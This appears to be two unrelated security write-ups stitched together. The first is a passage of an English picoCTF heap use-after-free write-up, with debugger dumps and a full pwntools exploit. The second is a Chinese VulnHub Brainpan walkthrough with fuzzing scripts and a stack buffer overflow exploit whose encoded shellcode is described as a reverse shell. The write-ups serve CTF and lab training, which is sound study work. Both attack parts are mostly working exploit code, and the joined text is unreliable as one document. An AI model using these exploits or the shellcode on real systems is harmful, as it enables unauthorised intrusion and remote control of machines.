────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "vuln", stopped 0x8048aff in i (), reason: SINGLE STEP ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x8048aff → i() [#1] 0x8048985 → doProcess() [#2] 0x8048d97 → main() ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef> heap bins ─────────────────────────────────────────────────────────────────────────────────────── Tcachebins for arena 0xf7fb5740 ─────────────────────────────────────────────────────────────────────────────────────── Tcachebins[idx=2, size=0x20] count=0 ← Chunk(addr=0x804c1a0, size=0x10, flags=PREV_INUSE) ──────────────────────────────────────────────────────────────────────────────────────── Fastbins for arena 0xf7fb5740 ──────────────────────────────────────────────────────────────────────────────────────── Fastbins[idx=0, size=0x10] 0x00 Fastbins[idx=1, size=0x18] 0x00 Fastbins[idx=2, size=0x20] 0x00 Fastbins[idx=3, size=0x28] 0x00 Fastbins[idx=4, size=0x30] 0x00 Fastbins[idx=5, size=0x38] 0x00 Fastbins[idx=6, size=0x40] 0x00 ──────────────────────────────────────────────────────────────────────────────────── Unsorted Bin for arena '*0xf7fb5740' ──────────────────────────────────────────────────────────────────────────────────── [+] Found 0 chunks in unsorted bin. ───────────────────────────────────────────────────────────────────────────────────── Small Bins for arena '*0xf7fb5740' ───────────────────────────────────────────────────────────────────────────────────── [+] Found 0 chunks in 0 small non-empty bins. ───────────────────────────────────────────────────────────────────────────────────── Large Bins for arena '*0xf7fb5740' ───────────────────────────────────────────────────────────────────────────────────── [+] Found 0 chunks in 0 large non-empty bins. gef> ``` Right after the `free` in `i()`, we can see that our `user` buffer was released and added to the `tcache` bin. Now, we'll call `leaveMessage` to leave a message: ``` $eax : 0x0804c1a0 → 0x00000000 $ebx : 0x0804b000 → 0x0804af0c → 0x00000001 $ecx : 0x20 $edx : 0x0 $esp : 0xffffd960 → 0x00000008 $ebp : 0xffffd988 → 0xffffd998 → 0xffffd9a8 → 0x00000000 $esi : 0xf7fb5000 → 0x001e4d6c $edi : 0xf7fb5000 → 0x001e4d6c $eip : 0x08048a61 → <leaveMessage+64> add esp, 0x10 $eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification] $cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── 0xffffd960│+0x0000: 0x00000008 ← $esp 0xffffd964│+0x0004: 0x08048f7f → 0x00632520 ("%c"?) 0xffffd968│+0x0008: 0xffffd984 → 0x0804b000 → 0x0804af0c → 0x00000001 0xffffd96c│+0x000c: 0x08048a2d → <leaveMessage+12> add ebx, 0x25d3 0xffffd970│+0x0010: 0xf7fb5000 → 0x001e4d6c 0xffffd974│+0x0014: 0xf7fb5000 → 0x001e4d6c 0xffffd978│+0x0018: 0xf7dfd0e5 → <toupper+5> add ecx, 0x1b7f1b 0xffffd97c│+0x001c: 0x08048c15 → <processInput+64> add esp, 0x10 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ──── 0x8048a57 <leaveMessage+54> sub esp, 0xc 0x8048a5a <leaveMessage+57> push 0x8 0x8048a5c <leaveMessage+59> call 0x8048620 <malloc@plt> → 0x8048a61 <leaveMessage+64> add esp, 0x10 0x8048a64 <leaveMessage+67> mov DWORD PTR [ebp-0xc], eax 0x8048a67 <leaveMessage+70> sub esp, 0x4 0x8048a6a <leaveMessage+73> push 0x8 0x8048a6c <leaveMessage+75> push DWORD PTR [ebp-0xc] 0x8048a6f <leaveMessage+78> push 0x0 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── [#0] Id 1, Name: "vuln", stopped 0x8048a61 in leaveMessage (), reason: SINGLE STEP ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── [#0] 0x8048a61 → leaveMessage() [#1] 0x8048d07 → processInput() [#2] 0x8048d86 → main() ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef> ``` If we stop right after the `malloc`, we can see that our `0x0804c1a0` buffer has been re-allocated and it returns as the message buffer. This happens since the current allocation request is for 8 bytes, and we happen to have such a chunk waiting patiently in the Heap Manager's `tcache` for an opportunity just like this one: The one previously known as `user`. Therefore, instead of creating a new chunk, the Heap Manager chooses to save some overhead and return the chunk from the cache. We even have the ability to write to it since the function calls `read` immediately after. But what should we write? After returning from `leaveMessage` to `processInput` and back to the main loop, `doProcess(user)` will be called: ```c void doProcess(cmd* obj) { (*obj->whatToDo)(); } ``` So `doProcess` will dereference the pointer (which we now control as part of our message) and call the pointer at offset 0 (`"whatToDo"`). Therefore, we'd like to make sure that this memory location points to `hahaexploitgobrrr` in order to get our flag. Putting it all together, we have the following exploit: ```python # First, generate a template using: # pwn template --host mercury.picoctf.net --port 4593 ./vuln #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: i386-32-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: No PIE (0x8048000) from enum import Enum class Commands(Enum): SUBSCRIBE = "S" DELETE_ACCOUNT = "I" CREATE_ACCOUNT = "M" PAY = "P" LEAVE_MESSAGE = "L" EXIT = "E" def send_command(command): io.recvuntil("(e)xit\n") io.sendline(command.value) def subscribe(): log.info("Subscribing") memleak_line = "OOP! Memory leak..." send_command(Commands.SUBSCRIBE) line = io.recvlineS() if line == "Not logged in!": return None elif memleak_line in line: addr = int(line.replace(memleak_line, "").strip(), 16) log.info("Leaked address: {}".format(hex(addr))) io.recvline() return addr else: raise RuntimeError(f"Unexpected output during subscription: {line}") def delete_account(): log.info("Deleting account") send_command(Commands.DELETE_ACCOUNT) io.sendlineafter("You're leaving already(Y/N)?\n", "Y") io.recvline() def leave_message(msg): log.info("Leaving message:\n{}".format(hexdump(msg))) send_command(Commands.LEAVE_MESSAGE) io.sendlineafter("try anyways:\n", msg) def exit(): log.info("Exiting") send_command(Commands.EXIT) io = start() hahaexploitgobrrr_addr = subscribe() delete_account() payload = p32(hahaexploitgobrrr_addr) + p32(0) leave_message(payload) log.success(io.recvlineS()) exit() ``` Output: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/Unsubscriptions_Are_Free] └─$ python3 exploit.py [*] '/media/sf_CTFs/pico/Unsubscriptions_Are_Free/vuln' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) [+] Opening connection to mercury.picoctf.net on port 4593: Done [*] Subscribing [*] Leaked address: 0x80487d6 [*] Deleting account [*] Leaving message: 00000000 d6 87 04 08 00 00 00 00 │····│····│ 00000008 [+] picoCTF{d0ubl3_j30p4rdy_ba307b82} [*] Exiting ```
sec-knowleage
# Brainpan:1 下载地址:https://download.vulnhub.com/brainpan/Brainpan.zip ## **实战演练** netdiscover命令查找靶机的IP ![](../../.gitbook/assets/1564734801_5d43f5514afe3.png) 使用nmap查看靶机开放了那些端口 ![](../../.gitbook/assets/1564735064_5d43f6588c572.png) nc9999端口,拒绝访问 ![](../../.gitbook/assets/1564736593_5d43fc512a56e.png) 10000端口是个HTTP服务器,浏览器打开 ![](../../.gitbook/assets/1564735160_5d43f6b83ffdd.png) 没看到有什么东西,目录爆破一下。找到了一个bin目录 ![](../../.gitbook/assets/1564735356_5d43f77ca819f.png) ![](../../.gitbook/assets/1564735391_5d43f79f2f43c.png) 下载这个exe文件,查看信息。 ``` root@kali:~# file brainpan.exe brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows root@kali:~# strings brainpan.exe !This program cannot be run in DOS mode. .text `.data .rdata @.bss .idata [^_] AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA [^_] [get_reply] s = [%s] [get_reply] copied %d bytes to buffer shitstorm _| _| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| _| _| _|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _| _| _| [________________________ WELCOME TO BRAINPAN _________________________] ENTER THE PASSWORD >> ACCESS DENIED ACCESS GRANTED [+] initializing winsock... [!] winsock init failed: %d done. [!] could not create socket: %d [+] server socket created. [!] bind failed: %d [+] bind done on port %d [+] waiting for connections. [+] received connection. [+] check is %d [!] accept failed: %d [+] cleaning up. -LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32 w32_sharedptr->size == sizeof(W32_EH_SHARED) ../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c GetAtomNameA (atom, s, sizeof(s)) != 0 AddAtomA ExitProcess FindAtomA GetAtomNameA SetUnhandledExceptionFilter __getmainargs __p__environ __p__fmode __set_app_type _assert _cexit _iob _onexit _setmode abort atexit free malloc memset printf signal strcmp strcpy strlen WSACleanup WSAGetLastError WSAStartup accept bind closesocket htons listen recv send socket ``` 看到**strcpy**这个函数,可能存在缓冲区溢出漏洞 在**XP系统**上面使用ImmunityDebugger进行调试,点击运行按钮 ![](../../.gitbook/assets/1564739819_5d4408eb3db3d.png) payload ``` root@kali:~# cat fuzz.py import sys,socket victim = '192.168.0.103' port = 9999 payload = "\x41" * 1000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "[-] Connecting to " + str(victim) s.connect((victim, port)) s.recv(1024) # Send payload print "[-] Sending payload.... ", s.send(payload) print "Done" except: print "[-] Unable to connect to " + str(victim) sys.exit(0) ``` 运行py ![](../../.gitbook/assets/1564739697_5d440871df116.png) 下一步,我们需要多少字节来填充缓冲区才能让我们进入**eip** ?创造测试字符串 ![](../../.gitbook/assets/1564740529_5d440bb18cd48.png) payload ![](../../.gitbook/assets/1564740595_5d440bf3640d5.png) 我们可以看到EIP的位置已经被35724134覆盖了 ![](../../.gitbook/assets/1564740669_5d440c3d075ac.png) 我们将其推入Metasploit的模式偏移工具,它将为我们提供我们需要发送到缓冲区以控制的字节数`eip` ![](../../.gitbook/assets/1564742025_5d4411892409b.png) 我们发送524个"A",4个"B"和1000个"C",看看什么效果 ``` import socket,sys junk = "\x41"*524 eip = "\x42"*4 shellcode = "\x43"*1000 payload = junk+eip+shellcode s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect(('192.168.2.14',9999)) # IP of WinXP SP3 machine running brainpan.exe except: print "[-] Connection failed! Noob!" sys.exit(0) s.recv(1024) s.send(payload) ``` 在EIP那里有4个42,被字符"B"填充了 ![](../../.gitbook/assets/1564742747_5d44145be1081.png) 让我们看看我们是否能找到`jmp esp`函数的地址。在Immunity Debugger中,使用`ctrl-f`并输入搜索`jmp esp`。正如您在下面看到的,我们的第一个地址`jmp esp`是`311712F3`**重新运行程序** ![](../../.gitbook/assets/1564743528_5d441768c0d51.png) 生成反弹shell ![](../../.gitbook/assets/1564756579_5d444a63c324e.png) payload ``` root@kali:~# cat fuzz.py import sys,socket victim = '192.168.0.101' port = 9999 junk = "\x41" * 524 eip = "\xf3\x12\x17\x31" #jmp esp 311712F3 brainpan.exe shellcode = "\x90" * 50 buf = "" buf += "\xd9\xc5\xd9\x74\x24\xf4\xb8\x1e\xc6\x68\xe1\x5d\x31" buf += "\xc9\xb1\x52\x83\xc5\x04\x31\x45\x13\x03\x5b\xd5\x8a" buf += "\x14\x9f\x31\xc8\xd7\x5f\xc2\xad\x5e\xba\xf3\xed\x05" buf += "\xcf\xa4\xdd\x4e\x9d\x48\x95\x03\x35\xda\xdb\x8b\x3a" buf += "\x6b\x51\xea\x75\x6c\xca\xce\x14\xee\x11\x03\xf6\xcf" buf += "\xd9\x56\xf7\x08\x07\x9a\xa5\xc1\x43\x09\x59\x65\x19" buf += "\x92\xd2\x35\x8f\x92\x07\x8d\xae\xb3\x96\x85\xe8\x13" buf += "\x19\x49\x81\x1d\x01\x8e\xac\xd4\xba\x64\x5a\xe7\x6a" buf += "\xb5\xa3\x44\x53\x79\x56\x94\x94\xbe\x89\xe3\xec\xbc" buf += "\x34\xf4\x2b\xbe\xe2\x71\xaf\x18\x60\x21\x0b\x98\xa5" buf += "\xb4\xd8\x96\x02\xb2\x86\xba\x95\x17\xbd\xc7\x1e\x96" buf += "\x11\x4e\x64\xbd\xb5\x0a\x3e\xdc\xec\xf6\x91\xe1\xee" buf += "\x58\x4d\x44\x65\x74\x9a\xf5\x24\x11\x6f\x34\xd6\xe1" buf += "\xe7\x4f\xa5\xd3\xa8\xfb\x21\x58\x20\x22\xb6\x9f\x1b" buf += "\x92\x28\x5e\xa4\xe3\x61\xa5\xf0\xb3\x19\x0c\x79\x58" buf += "\xd9\xb1\xac\xcf\x89\x1d\x1f\xb0\x79\xde\xcf\x58\x93" buf += "\xd1\x30\x78\x9c\x3b\x59\x13\x67\xac\xa6\x4c\x67\x46" buf += "\x4f\x8f\x67\x87\xd3\x06\x81\xcd\xfb\x4e\x1a\x7a\x65" buf += "\xcb\xd0\x1b\x6a\xc1\x9d\x1c\xe0\xe6\x62\xd2\x01\x82" buf += "\x70\x83\xe1\xd9\x2a\x02\xfd\xf7\x42\xc8\x6c\x9c\x92" buf += "\x87\x8c\x0b\xc5\xc0\x63\x42\x83\xfc\xda\xfc\xb1\xfc" buf += "\xbb\xc7\x71\xdb\x7f\xc9\x78\xae\xc4\xed\x6a\x76\xc4" buf += "\xa9\xde\x26\x93\x67\x88\x80\x4d\xc6\x62\x5b\x21\x80" buf += "\xe2\x1a\x09\x13\x74\x23\x44\xe5\x98\x92\x31\xb0\xa7" buf += "\x1b\xd6\x34\xd0\x41\x46\xba\x0b\xc2\x76\xf1\x11\x63" buf += "\x1f\x5c\xc0\x31\x42\x5f\x3f\x75\x7b\xdc\xb5\x06\x78" buf += "\xfc\xbc\x03\xc4\xba\x2d\x7e\x55\x2f\x51\x2d\x56\x7a" payload = junk + eip + shellcode + buf print(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "[-] Connecting to " + str(victim) s.connect((victim, port)) s.recv(1024) # Send payload print "[-] Sending payload.... ", s.send(payload) print "Done" except: print "[-] Unable to connect to " + str(victim) sys.exit(0) ``` 监听shell ![](../../.gitbook/assets/1564757532_5d444e1c6eb6f.png) 连接到windows机器 ![](../../.gitbook/assets/1564757416_5d444da8f2a96.png) 上面的是windows的shell,重新生成linux ![](../../.gitbook/assets/1564757740_5d444eecdbd25.png) 再将上面的buf修改一下就行 ![](../../.gitbook/assets/1564757879_5d444f778ee79.png) ![](../../.gitbook/assets/1564758199_5d4450b791bfa.png) ![](../../.gitbook/assets/1564758249_5d4450e9220d6.png) 提权成功 ![image-20230208134013330](../../.gitbook/assets/image-20230208134013330.png)
sec-knowleage